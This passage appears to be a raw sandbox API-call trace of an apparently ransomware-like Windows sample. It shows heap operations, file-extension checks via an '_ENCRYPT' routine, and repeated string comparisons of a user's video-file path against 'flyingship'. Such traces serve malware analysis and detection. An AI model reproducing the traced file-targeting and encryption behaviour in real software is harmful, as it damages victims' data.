lpUsedDefaultChar=0x0) returned 12 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0197.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.619] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0197.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.619] CloseHandle (hObject=0x158) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.620] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.620] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.621] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.621] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.621] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.621] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.621] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.621] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.621] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.622] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0x90add8 [0197.624] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.624] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0x90add8 [0197.624] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.625] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\Op 